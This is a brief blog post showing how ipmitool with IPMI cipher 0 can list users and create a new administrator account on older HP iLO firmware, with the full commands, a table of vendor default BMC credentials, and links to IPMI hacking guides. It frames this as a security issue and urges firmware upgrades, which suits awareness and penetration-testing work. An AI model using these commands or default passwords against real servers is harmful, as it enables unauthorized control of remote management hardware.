Ubuntu has a package called ipmitool in it's repository. Using ipmitool you can list the users and add a new Administrative user. For HP iLo this works on firmware up to v1.6 on iLo3 and up to v1.3 on iLo4.
To install ipmitool
sudo apt-get install ipmitool
Once the install is complete you can use the list command to see the current users:
ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
Once you run the list command look for an ID that shows ( Empty User).
On the server I used this command on ID2 was empty so I ran:
ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 Monitor
to create a new user.
and finally
ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 SecretPassword
to create a password.
Obviously this is a security issue! You must upgrade your firmware to fix this issue.
All manufactures except HP use a default password so you don't even have to create a user if IT didn't change the default.
Product Name | Default Username | Default Password |
---|---|---|
HP Integrated Lights Out (iLO) | Administrator | <factory randomized 8-character string> |
Dell Remote Access Card (iDRAC, DRAC) | root | calvin |
IBM Integrated Management Module (IMM) | USERID | PASSW0RD (with a zero) |
Fujitsu Integrated Remote Management Controller | admin | admin |
Supermicro IPMI (2.0) | ADMIN | ADMIN |
Oracle/Sun Integrated Lights Out Manager (ILOM) | root | changeme |
ASUS iKVM BMC | admin | admin |
The reference websites listed below have much more information on IPMI hacking. The link HPiLO Cmdlets is an article on using Powershell under Windows to manage iLo.
References
Hacking IPMI Cipher 0 Using Kali Linux - A nice tutorial on using ipmitool and bmc-configA Penetration Tester's Guide to IPMI and BMCs - A great tutorial on the Cipher 0 issue and IPMI
How to find all the iLO’s on your network - A nice bash script for locating iLo devices on a subnet
HPiLO Cmdlets Version 1.2.0.0 - HP's download for iLo Powershell Cmdlets
HewlettPackard PowerShell Sample Scripts - Some official HP sample scripts
GNU FreeIPMI - A Linux package for working with BMCs
IPMITOOL useful examples
IPMI++ Security Best Practices
No comments:
Post a Comment